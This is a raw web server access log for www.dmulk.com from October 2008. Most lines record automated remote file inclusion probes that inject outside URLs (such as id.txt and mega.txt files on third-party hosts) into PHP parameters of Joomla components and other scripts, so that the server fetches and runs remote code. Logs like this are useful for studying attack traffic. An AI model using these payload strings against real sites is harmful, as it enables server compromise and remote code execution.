75.125.14.50 - - [23/Oct/2008:09:03:07 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [23/Oct/2008:09:03:09 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:09 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [23/Oct/2008:09:03:09 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:10 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:10 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:10 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:10 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:10 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.85.130.159 - - [23/Oct/2008:09:03:10 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:10 -0700] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:03:11 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:11 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 95256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:12 -0700] "GET /logs/access_080915.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:13 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:13 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:03:14 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:03:14 -0700] "GET /logs/access_080614.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:19 -0700] "GET /logs/access_080523.log//modules/agendax/addevent.inc.php?agendax_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:20 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:20 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:03:32 -0700] "GET /logs/access_080915.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:03:35 -0700] "GET /logs/access_080614.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:36 -0700] "GET /logs/access_080820.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.152.167 - - [23/Oct/2008:09:03:39 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:41 -0700] "GET /logs/access_080229.log//modules/agendax/addevent.inc.php?agendax_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.95.194 - - [23/Oct/2008:09:03:48 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.95.194 - - [23/Oct/2008:09:03:48 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:48 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:03:51 -0700] "GET /logs/access_080820.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:00 -0700] "GET /logs/access_080924.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:18 -0700] "GET /logs/access_080730.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:18 -0700] "GET /logs/access_080928.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:21 -0700] "GET /logs/access_080906.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:04:21 -0700] "GET /logs/access_080924.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:04:21 -0700] "GET /logs/index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:22 -0700] "GET /logs/access_080816.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:22 -0700] "GET /logs/access_080706.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:04:22 -0700] "GET /index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 200 94798 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.95.194 - - [23/Oct/2008:09:04:23 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.170 - - [23/Oct/2008:09:04:23 -0700] "GET /blog/index.php/2008/06/07/ HTTP/1.0" 200 11735 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:26 -0700] "GET /logs/access_080714.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:32 -0700] "GET /logs/access_080730.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:33 -0700] "GET /logs/access_080923.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:04:34 -0700] "GET /logs/access_080928.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:36 -0700] "GET /logs/access_080906.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:37 -0700] "GET /logs/access_080927.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:04:37 -0700] "GET /logs/access_080827.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:04:37 -0700] "GET /logs/access_080816.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:38 -0700] "GET /logs/access_080801.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:04:38 -0700] "GET /logs/access_080706.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:04:44 -0700] "GET /logs/access_080913.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:04:47 -0700] "GET /logs/access_080714.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.186.124.208 - - [23/Oct/2008:09:04:47 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:52 -0700] "GET /logs/access_080923.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:04:58 -0700] "GET /logs/access_080820.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:05:00 -0700] "GET /logs/access_080927.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:05:01 -0700] "GET /logs/access_080827.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:05:02 -0700] "GET /logs/access_080801.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:05:05 -0700] "GET /logs/index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:05:07 -0700] "GET /index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 200 94782 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:05:07 -0700] "GET /logs/index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:05:08 -0700] "GET /index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 200 94782 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:05:11 -0700] "GET /logs/access_080829.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:05:18 -0700] "GET /logs/index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:05:19 -0700] "GET /index.php?main=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 200 94766 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:05:21 -0700] "GET /logs/access_080829.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:05:26 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:05:27 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:05:27 -0700] "GET /components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:05:28 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:05:30 -0700] "GET /logs/access_080916.log/errors.php?error=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:05:34 -0700] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:05:34 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:05:34 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.95.194 - - [23/Oct/2008:09:05:51 -0700] "GET /logs/access_071216.log//ADMIN/header.php?language=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:05:52 -0700] "GET /logs/access_080925.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:06:09 -0700] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:06:09 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:09 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:11 -0700] "GET /admin.php?rd=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:06:11 -0700] "GET /logs/admin.php?rd=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:06:12 -0700] "GET /logs/access_080819.log/admin.php?rd=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:06:13 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:13 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:06:14 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:22 -0700] "GET /logs/access_080903.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:06:30 -0700] "GET /com_dbqueryhttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:31 -0700] "GET /logs/access_080711.log/com_dbqueryhttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:06:31 -0700] "GET /logs/com_dbqueryhttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:32 -0700] "GET /logs/access_080903.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.161 - - [23/Oct/2008:09:06:33 -0700] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://200.180.223.130/~elaine/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [23/Oct/2008:09:06:34 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://200.180.223.130/~elaine/id.txt?? HTTP/1.1" 200 95333 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:06:36 -0700] "GET /logs/access_080826.log/com_dbqueryhttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.115.110.161 - - [23/Oct/2008:09:06:36 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://200.180.223.130/~elaine/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.99 - - [23/Oct/2008:09:06:37 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:37 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:39 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=172 HTTP/1.1" 200 13559 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:46 -0700] "GET /index.php?inc=http://timjardim.com/id.txt?? HTTP/1.1" 200 94742 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:06:59 -0700] "GET /logs/access_080511.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:07:05 -0700] "GET /logs/access_080808.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.40 - - [23/Oct/2008:09:07:09 -0700] "GET /logs/access_071023.log HTTP/1.1" 200 25506 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:11 -0700] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:14 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:07:17 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:07:17 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:07:18 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:07:18 -0700] "GET /logs/access_080809.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:07:19 -0700] "GET /logs/access_080205.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:20 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:07:20 -0700] "GET /logs/access_080205.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:20 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:21 -0700] "GET /logs/access_080911.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:07:21 -0700] "GET /logs/access_080808.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:29 -0700] "GET /logs/access_080807.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:07:32 -0700] "GET /logs/access_080821.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:07:36 -0700] "GET /logs/access_080217.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
